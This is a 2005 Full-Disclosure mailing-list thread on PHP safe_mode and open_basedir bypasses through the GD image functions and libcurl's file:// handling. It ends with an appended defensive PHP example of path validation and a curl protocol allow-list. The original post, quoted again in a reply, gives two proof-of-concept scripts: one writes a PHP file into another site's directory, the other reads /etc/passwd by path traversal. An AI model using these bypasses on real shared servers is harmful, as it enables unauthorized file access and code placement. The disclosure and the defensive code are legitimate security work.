Re: [Full-disclosure] PHP Safedir Restriction Bypass Vulnerabilities

2005-10-18 Thread Stefan Esser
Hello,

> In regards to the curl, I have just checked all the PHP curl code;
> this was fixed in 4.3.10 from what I can see, because I wrote a patch
> to stop the open_basedir in curl until PHP fixed it. I submitted it
> a long time ago but the PHP devs were all "blah blah blah 3rd party
> software blah blah not our problem"

Just because you close one (more) file:// hole with a patch, you do not
solve the 3rd party library problem. As long as you have CURL compiled with
file:// support you can bypass safe_mode/open_basedir in PHP. There are
enough hidden features in libcurl that allow feeding it file://
URLs without PHP ever knowing about it.

Just face it: safe_mode is not safe, never was and never will be. It is
simply impossible for an application to put access control restrictions
over (hidden) features of 3rd party libraries that are not exported.
And with PHP6 safe_mode, register_globals and all the crap will most
probably disappear.

Stefan

-- 
--
 Stefan Esser             [EMAIL PROTECTED]
 Hardened-PHP Project     http://www.hardened-php.net/

 GPG-Key                  gpg --keyserver pgp.mit.edu --recv-key 0x15ABDA78
 Key fingerprint          7806 58C8 CFA8 CE4A 1C2C  57DD 4AE1 795E 15AB DA78
--

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] PHP Safedir Restriction Bypass Vulnerabilities

2005-10-18 Thread VeNoMouS
In regards to the curl, I have just checked all the PHP curl code; this was fixed in 4.3.10 from
what I can see, because I wrote a patch to stop the open_basedir in
curl until PHP fixed it. I submitted it a long time ago but the PHP devs
were all "blah blah blah 3rd party software blah blah not our problem"

I'm not sure if there's a patch for the imagegif() as
I haven't seen that one before.

  ----- Original Message -----
  From: peter MC tachatte
  To: full-disclosure@lists.grok.org.uk
  Sent: Tuesday, October 18, 2005 9:55 AM
  Subject: [Full-disclosure] PHP Safedir Restriction Bypass Vulnerabilities

  There is a vulnerability (Safedir Restriction Bypass) identified
  within the GD extension affecting the following functions:
  - imagegif()
  - imagepng()
  - imagejpeg()
  in /ext/gd/gd.c line 1647
  Which is now fixed in the CVS: http://cvs.php.net/co.php/php-src/ext/gd/gd.c?r=1.312.2.1#1786
  POC:
  with an image like http://81.57.125.106/~slythers/file.gif

  <?php
  $im = imagecreatefromgif("file.gif");
  imagegif($im, '/var/www/f34r.fr/c/f/elbossoso/.i.need.money.php');
  ?>

  curl openbasedir and safemode bypass. POC:

  <?php
  mkdir("./".$_SERVER["SCRIPT_NAME"]."?");
  $ch = curl_init("file://".$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../../../../../etc/passwd");
  $file=curl_exec($ch);
  echo $file;
  ?>

  As you notice, we can bypass the safedir which leads to access to any files on any shared
  servers. This is fixed in the cvs.
  [EMAIL PROTECTED]
  greets: david coallier <[EMAIL PROTECTED]>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] PHP Safedir Restriction Bypass Vulnerabilities

2005-10-17 Thread peter MC tachatte
There is a vulnerability (Safedir Restriction Bypass) identified within the GD extension affecting the following functions:
- imagegif()
- imagepng()
- imagejpeg()
in /ext/gd/gd.c line 1647
Which is now fixed in the CVS: http://cvs.php.net/co.php/php-src/ext/gd/gd.c?r=1.312.2.1#1786
POC:
with an image like http://81.57.125.106/~slythers/file.gif

<?php
$im = imagecreatefromgif("file.gif");
imagegif($im, '/var/www/f34r.fr/c/f/elbossoso/.i.need.money.php');
?>

curl openbasedir and safemode bypass.
POC:

<?php
mkdir("./".$_SERVER["SCRIPT_NAME"]."?");
$ch = curl_init("file://".$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../../../../../etc/passwd");
$file=curl_exec($ch);
echo $file;
?>

As you notice, we can bypass the safedir which leads to access to any files on any shared servers. This is fixed in the cvs.
[EMAIL PROTECTED]
greets: david coallier <[EMAIL PROTECTED]>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
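A defender-side counterpart to the two PoCs in this thread and to Stefan's point about libcurl, added here as an example (it is not part of the thread and not the gd.c fix): the application resolves the caller's output path against an allowed base directory before imagegif() ever sees it, and tells libcurl itself which URL schemes are permitted, so file:// is refused inside the library rather than by a PHP-side string check. It assumes PHP 8 (str_starts_with, GdImage) and a libcurl that implements CURLOPT_PROTOCOLS; the base directory and demo paths are constructed for the demo.

```php
<?php
// Added example, not from the thread and not PHP's own fix. Assumes PHP 8 and a libcurl
// that honours CURLOPT_PROTOCOLS; $baseDir is the only directory the script may write into.

// Resolve a requested output path and accept it only if it lands inside $baseDir.
// The target usually does not exist yet, so its parent directory is resolved instead.
function safe_output_path(string $baseDir, string $requested): ?string
{
    if (str_contains($requested, "\0")) {
        return null;
    }
    $base = realpath($baseDir);
    $parent = realpath(dirname($requested));
    $name = basename($requested);
    if ($base === false || $parent === false || $name === '' || $name === '.' || $name === '..') {
        return null;
    }
    // The resolved parent must be $baseDir itself or a descendant of it.
    if ($parent !== $base && !str_starts_with($parent, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $parent . DIRECTORY_SEPARATOR . $name;
}

// Write a GIF only to a path that passed the check; imagegif() never sees a raw caller path.
function write_gif(GdImage $im, string $baseDir, string $requested): bool
{
    $path = safe_output_path($baseDir, $requested);
    return $path !== null && imagegif($im, $path);
}

// Fetch with libcurl restricted to HTTP(S) for the URL and for any redirect target, so
// file:// and other schemes are refused inside libcurl rather than by a PHP-side string check.
function fetch_http_only(string $url): string|false
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}

// Constructed demo: a scratch base directory with one subdirectory.
$base = sys_get_temp_dir() . '/gd_guard_demo';
@mkdir($base . '/thumbs', 0700, true);
var_dump(safe_output_path($base, $base . '/thumbs/out.gif'));      // path stays inside $base
var_dump(safe_output_path($base, $base . '/thumbs/../../x.php'));  // parent resolves outside $base
var_dump(fetch_http_only('file:///etc/passwd'));                   // file:// is not in the allow-list
```

CURLOPT_PROTOCOLS post-dates this thread (libcurl 7.19.4); on PHP 8.3 with a recent libcurl the same allow-list is spelled CURLOPT_PROTOCOLS_STR with the string "http,https".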